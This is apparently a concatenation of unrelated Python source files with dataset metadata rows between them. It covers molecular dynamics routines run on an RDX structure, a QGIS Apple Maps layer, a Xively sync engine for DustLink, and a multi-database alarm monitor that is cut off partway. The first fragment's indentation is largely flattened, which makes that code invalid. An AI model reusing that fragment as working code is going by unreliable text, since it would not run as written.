# at v (v(t+dt/2))
def get_temperature(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v.squared()
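    # equipartition: sum(m*v^2) = (3N-6)*R*T over the internal degrees of
    # freedom; /fconst converts amu*(A/ps)^2 to kcal/mol and *1000 matches
    # Rgas, assuming Rgas is given in cal/(mol*K)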
return 1000*sum_mv2/((3*len(atoms)-6)*Rgas*fconst)
def LeapFrogUpdate(atoms,dt):
# Leap-frog Verlet dynamics is based on the equations
# v(t+dt/2) = v(t-dt/2)+dt*a(t)
# r(t+dt) = r(t) + dt*v(t+dt/2)
# so that the positions, calculated at dt,2dt,3dt, etc.,
# leap-frog over the velocities, calculated at dt/2,3dt/2,5dt/2...
for atom in atoms:
m = atom.mass()
a = -atom.F*fconst/m # a = F/m
vnew = atom.v + dt*a # v(t+dt/2) = v(t-dt/2) + dt*a
# Save the current velocity for later calc of T,Ek
atom.v0 = 0.5*(vnew+atom.v) # v(t) = 0.5*(v(t-dt/2)+v(t+dt/2)
atom.r += dt*vnew # r(t+dt) = r(t) + dt*v(t+dt/2)
atom.v = vnew
return
def set_forces(atoms,F):
for i in xrange(len(atoms)):
fx,fy,fz = F[i]
atoms[i].F = array((fx,fy,fz))
return
def set_boltzmann_velocities(atoms,T):
    from random import gauss
    Eavg = Rgas*T/2000 # kT/2 per degree of freedom (kcal/mol, assuming Rgas in cal/(mol*K))
vels = []
for atom in atoms:
m = atom.mass()
vavg = sqrt(2*Eavg*fconst/m)
        # Maxwell-Boltzmann: each velocity component is Gaussian with mean 0 and
        # sigma = sqrt(kT/m), which is exactly the per-dof rms speed vavg above
        stdev = vavg
        atom.v = array((gauss(0.0,stdev),
                        gauss(0.0,stdev),
                        gauss(0.0,stdev)))
subtract_com_velocity(atoms)
rescale_velocities(atoms,T)
return
def subtract_com_velocity(atoms):
vcom = get_vcom(atoms)
for atom in atoms: atom.v -= vcom
return
def rescale_velocities(atoms,T):
Tact = get_temperature(atoms)
scalef = sqrt(T/Tact)
for atom in atoms: atom.v *= scalef
return
def get_vcom(atoms):
"Compute the Center of Mass Velocity"
vcom = zeros(3,'d')
totm = 0
for atom in atoms:
m = atom.mass()
vcom += m*atom.v
totm += m
return vcom/totm
if __name__ == '__main__':
from MINDO3 import get_energy_forces
from Molecule import Molecule
rdx = Molecule('RDX',filename='/home/rmuller/gallery/rdx.xyz')
Dynamics(rdx,get_energy_forces,nsteps=3,Ti=4000)
| bsd-3-clause | 6,966,622,816,214,444,000 | 32.581395 | 78 | 0.602955 | false | 2.717691 | false | false | false |
TIGER-NET/WOIS_plugins | openlayers_plugin/weblayers/apple_maps.py | 5 | 1320 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
OpenLayers Plugin
A QGIS plugin
-------------------
begin : 2009-11-30
copyright : (C) 2009 by Pirmin Kalberer, Sourcepole
email : pka at sourcepole.ch
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from weblayer import WebLayer3857
class OlAppleiPhotoMapLayer(WebLayer3857):
emitsLoadEnd = True
def __init__(self):
WebLayer3857.__init__(self, groupName="Apple Maps", groupIcon="apple_icon.png",
name='Apple iPhoto map', html='apple.html')
| gpl-3.0 | 1,019,599,708,684,583,700 | 40.25 | 87 | 0.370455 | false | 5.617021 | false | false | false |
twatteyne/dustlink_academy | DataConnector/XivelySyncEngine.py | 2 | 9707 | #!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
    CHECKDELAY = 5 # in s, delay between checks for a configured API key
def __init__(self):
# log
log.info('creating instance')
# store params
# local variables
self.connector = None
self.lastCheck = None
self.xivelyApiKey = None
self.subscribedMotes = []
self.statusLock = threading.Lock()
self.status = {}
self.status['apiKeySet'] = 'WAIT...'
self.status['status'] = 'DISCONNECTED'
self.status['numConnectionsOK'] = 0
self.status['numConnectionsFailed'] = 0
self.status['numSubscriptionsFailed'] = 0
self.status['lastConnected'] = None
self.status['lastDisconnected'] = None
self.status['numPublishedOK'] = 0
self.status['numPublishedFail'] = 0
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'newDataMirrored',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_xivelyConnector'
# connect extra events
dispatcher.connect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
# add stats
#======================== public ==========================================
def getStatus(self):
with self.statusLock:
return copy.deepcopy(self.status)
#======================== private =========================================
def _cleanup(self):
# disconnect extra events
dispatcher.disconnect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
def _publish(self,sender,signal,data):
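        # Called for every mirrored datapoint; three phases follow:
        # 1) every CHECKDELAY seconds, reconcile the Xively connection with the
        #    configured API key (connect/disconnect as needed),
        # 2) publish the new value to the mote's datastream,
        # 3) on first sight of a mote, optionally create and subscribe its
        #    'led' datastream so Xively can drive the mote's LED via _led_cb.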
now = time.time()
dld = DustLinkData.DustLinkData()
mac = data['mac']
#========== connect/disconnect
if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
# remember I just checked
self.lastCheck = now
# we need to use "raw" access because dld.getPublisherSettings()
# does not return all settings
settings = dld.get(['system','publishers','xively'])
# record the xivelyApiKey
xivelyApiKey = None
if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
xivelyApiKey = settings['xivelyApiKey']
# update status
if xivelyApiKey==None:
with self.statusLock:
self.status['apiKeySet'] = 'NO'
else:
with self.statusLock:
self.status['apiKeySet'] = 'YES'
# decide whether to connect/disconnect
if (not self.connector) and xivelyApiKey:
# connect
# log
log.info("Connecting to Xively")
# remember API key
self.xivelyApiKey = xivelyApiKey
# connect
try:
self.connector = xivelyConnector.xivelyConnector(
apiKey = self.xivelyApiKey,
productName = 'SmartMesh IP Starter Kit',
productDesc = 'Connecting using DustLink',
)
except Exception as err:
# log
log.error("Error while connecting to Xively: {0}".format(err))
# update status
with self.statusLock:
self.status['status'] = 'CONNECTION FAILED'
self.status['numConnectionsFailed']+= 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['status'] = 'CONNECTED'
self.status['numConnectionsOK'] += 1
self.status['lastConnected'] = dld.timestampToStringShort(now)
elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
# disconnect
self._disconnect()
#========== publish data
if self.connector:
try:
self.connector.publish(
mac = data['mac'],
datastream = data['type'],
value = data['lastvalue'],
)
except Exception as err:
# log
log.error(
"Error while publishing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
data['type'],
err,
)
)
# update status
with self.statusLock:
self.status['numPublishedFail'] += 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['numPublishedOK'] += 1
#========== subscribe
if self.connector:
if mac not in self.subscribedMotes:
try:
if ('subscribeToLed' in data) and (data['subscribeToLed']):
# create datastream
self.connector.publish(
mac = mac,
datastream = 'led',
value = 0,
)
# subscribe
self.connector.subscribe(
mac = mac,
datastream = 'led',
callback = self._led_cb,
)
except Exception as err:
# log
log.error(
"Error while subscribing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
'led',
err,
)
)
# update status
with self.statusLock:
self.status['status'] = 'SUBSCRIPTION FAILED'
self.status['numSubscriptionsFailed'] += 1
# disconnect
self._disconnect()
else:
self.subscribedMotes += [mac]
def _disconnect(self):
now = time.time()
dld = DustLinkData.DustLinkData()
# log
log.info("Disconnecting from Xively")
# close connector
try:
self.connector.close()
except Exception:
pass # happens when no active subscription
# reset variables
self.connector = None
self.xivelyApiKey = None
self.subscribedMotes = []
# update status
with self.statusLock:
self.status['status'] = 'DISCONNECTED'
self.status['lastDisconnected'] = dld.timestampToStringShort(now)
def _led_cb(self,mac,datastream,value):
# all non-0 values turn LED on
if value==0:
value = 0
else:
value = 1
dispatcher.send(
signal = 'fieldsToMesh_OAPLED',
data = {
'mac': mac,
'fields': {
'status': value,
},
}
)
| bsd-3-clause | -8,450,043,477,461,482,000 | 33.917266 | 96 | 0.394664 | false | 5.767677 | false | false | false |
JK-Warriors/Heimdallr | python/alarm.py | 1 | 81692 | #!/bin/env python
#-*-coding:utf-8-*-
import os
import sys
import string
import time
import datetime
import MySQLdb
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
path='./include'
sys.path.insert(0,path)
import functions as func
import sendmail
import sendsms_fx
import sendsms_api
send_mail_max_count = func.get_option('send_mail_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
mail_to_list_common = func.get_option('send_mail_to_list')
send_sms_max_count = func.get_option('send_sms_max_count')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
sms_to_list_common = func.get_option('send_sms_to_list')
def get_alarm_mysql_status():
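    # Join the latest mysql_status samples with each server's alarm thresholds
    # (db_cfg_mysql) and, per metric, raise warning/critical alarms or clear
    # them again, updating the dashboard status rows along the way.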
sql="select a.server_id,a.connect,a.threads_connected,a.threads_running,a.threads_waits,a.create_time,a.host,a.port,b.alarm_threads_connected,b.alarm_threads_running,alarm_threads_waits,b.threshold_warning_threads_connected,b.threshold_critical_threads_connected,b.threshold_warning_threads_running,b.threshold_critical_threads_running,threshold_warning_threads_waits,threshold_critical_threads_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_status a, db_cfg_mysql b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
threads_connected=line[2]
threads_running=line[3]
threads_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_threads_connected=line[8]
alarm_threads_running=line[9]
alarm_threads_waits=line[10]
threshold_warning_threads_connected=line[11]
threshold_critical_threads_connected=line[12]
threshold_warning_threads_running=line[13]
threshold_critical_threads_running=line[14]
threshold_warning_threads_waits=line[15]
threshold_critical_threads_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mysql server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mysql server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_threads_connected)==1:
if int(threads_connected)>=int(threshold_critical_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'critical','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'threads_connected',threads_connected,'critical')
elif int(threads_connected)>=int(threshold_warning_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'warning','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'threads_connected',threads_connected,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'threads_connected',threads_connected,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'threads connected ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_running)==1:
if int(threads_running)>=int(threshold_critical_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'critical','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'threads_running',threads_running,'critical')
elif int(threads_running)>=int(threshold_warning_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'warning','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'threads_running',threads_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'threads_running',threads_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'threads running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_waits)==1:
if int(threads_waits)>=int(threshold_critical_threads_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'critical','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'threads_waits',threads_waits,'critical')
                    elif int(threads_waits)>=int(threshold_warning_threads_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'warning','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'threads_waits',threads_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'threads_waits',threads_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'threads waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_mysql_replcation():
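    # MySQL slave health: IO/SQL thread state and replication delay in seconds.
    # The "replcation" spelling is kept as-is in case callers reference it.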
sql = "select a.server_id,a.slave_io_run,a.slave_sql_run,a.delay,a.create_time,b.host,b.port,b.alarm_repl_status,b.alarm_repl_delay,b.threshold_warning_repl_delay,b.threshold_critical_repl_delay,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_dr_s a, db_cfg_mysql b where a.server_id=b.id and a.is_slave='1';"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
slave_io_run=line[1]
slave_sql_run=line[2]
delay=line[3]
create_time=line[4]
host=line[5]
port=line[6]
alarm_repl_status=line[7]
alarm_repl_delay=line[8]
threshold_warning_repl_delay=line[9]
threshold_critical_repl_delay=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_repl_status)==1:
if (slave_io_run== "Yes") and (slave_sql_run== "Yes"):
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'ok')
if int(alarm_repl_delay)==1:
if int(delay)>=int(threshold_critical_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'critical','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',delay,'critical')
elif int(delay)>=int(threshold_warning_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'warning','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',2,host,port,create_time,'repl_delay',delay,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',delay,'ok')
else:
send_mail = func.update_send_mail_status(server_id,db_type,'replication',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'replication',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical','replication stop',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',3,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
pass
def get_alarm_oracle_status():
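    # Oracle: availability, session totals/actives/waits, flashback space
    # usage and, for physical standbys, MRP process state and apply delay.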
sql = """SELECT a.server_id,
a.connect,
a.session_total,
a.session_actives,
a.session_waits,
CONVERT(a.flashback_space_used, DECIMAL(10,2)) as flashback_space_used,
a.database_role,
a.dg_stats,
a.dg_delay,
a.create_time,
b.HOST,
b.PORT,
b.alarm_session_total,
b.alarm_session_actives,
b.alarm_session_waits,
b.alarm_fb_space,
b.threshold_warning_session_total,
b.threshold_critical_session_total,
b.threshold_warning_session_actives,
b.threshold_critical_session_actives,
b.threshold_warning_session_waits,
b.threshold_critical_session_waits,
b.threshold_warning_fb_space,
b.threshold_critical_fb_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_status a, db_cfg_oracle b
WHERE a.server_id = b.id """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
session_total=line[2]
session_actives=line[3]
session_waits=line[4]
flashback_space_used=line[5]
database_role=line[6]
mrp_status=line[7]
dg_delay=line[8]
create_time=line[9]
host=line[10]
port=line[11]
alarm_session_total=line[12]
alarm_session_actives=line[13]
alarm_session_waits=line[14]
alarm_fb_space=line[15]
threshold_warning_session_total=line[16]
threshold_critical_session_total=line[17]
threshold_warning_session_actives=line[18]
threshold_critical_session_actives=line[19]
threshold_warning_session_waits=line[20]
threshold_critical_session_waits=line[21]
threshold_warning_fb_space=line[22]
threshold_critical_fb_space=line[23]
send_mail=line[24]
send_mail_to_list=line[25]
send_sms=line[26]
send_sms_to_list=line[27]
tags=line[28]
db_type=line[29]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','oracle server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','oracle server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_session_total)==1:
if int(session_total) >= int(threshold_critical_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'critical','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'session_total',session_total,'critical')
elif int(session_total) >= int(threshold_warning_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'warning','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'session_total',session_total,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'session_total',session_total,'ok')
if int(alarm_session_actives)==1:
if int(session_actives) >= int(threshold_critical_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'critical','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'session_actives',session_actives,'critical')
elif int(session_actives) >= int(threshold_warning_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'warning','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'session_actives',session_actives,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'active sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'session_actives',session_actives,'ok')
if int(alarm_session_waits)==1:
if int(session_waits) >= int(threshold_critical_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'critical','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'session_waits',session_waits,'critical')
elif int(session_waits) >= int(threshold_warning_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'warning','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'session_waits',session_waits,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'waits sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'session_waits',session_waits,'ok')
if int(alarm_fb_space)==1:
if int(flashback_space_used) >= int(threshold_critical_fb_space):
send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'critical','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('flashback_space',3,host,port,create_time,'flashback_space_used',flashback_space_used,'critical')
elif int(flashback_space_used) >= int(threshold_warning_fb_space):
send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'warning','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',2,host,port,create_time,'flashback_space_used',flashback_space_used,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'flashback space ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',1,host,port,create_time,'flashback_space_used',flashback_space_used,'ok')
if database_role=="PHYSICAL STANDBY":
if int(dg_delay) >= 3600*3 or int(mrp_status) < 1:
if int(dg_delay) >= 3600*3:
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'warning','replication delay more than 3 hours',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            func.update_db_status('repl_delay',2,host,port,create_time,'repl_delay',dg_delay,'warning')
if int(mrp_status) < 1:
send_mail = func.update_send_mail_status(server_id,db_type,'mrp_status',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'mrp_status',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'mrp_status',mrp_status,'warning','MRP process is down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',2,host,port,create_time,'mrp_status',mrp_status,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl',mrp_status,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'repl',mrp_status,'ok')
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',dg_delay,'ok')
else:
pass
def get_alarm_sqlserver_status():
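    # SQL Server: availability plus total / running / waiting process counts.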
sql="select a.server_id,a.connect,a.processes,a.processes_running,a.processes_waits,a.create_time,a.host,a.port,b.alarm_processes,b.alarm_processes_running,alarm_processes_waits,b.threshold_warning_processes,b.threshold_warning_processes_running,b.threshold_warning_processes_waits,b.threshold_critical_processes,threshold_critical_processes_running,threshold_critical_processes_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'sqlserver' as db_type from sqlserver_status a, db_cfg_sqlserver b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
processes=line[2]
processes_running=line[3]
processes_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_processes=line[8]
alarm_processes_running=line[9]
alarm_processes_waits=line[10]
threshold_warning_processes=line[11]
threshold_warning_processes_running=line[12]
threshold_warning_processes_waits=line[13]
threshold_critical_processes=line[14]
threshold_critical_processes_running=line[15]
threshold_critical_processes_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','sqlserver server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','sqlserver server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_processes)==1:
if int(processes)>=int(threshold_critical_processes):
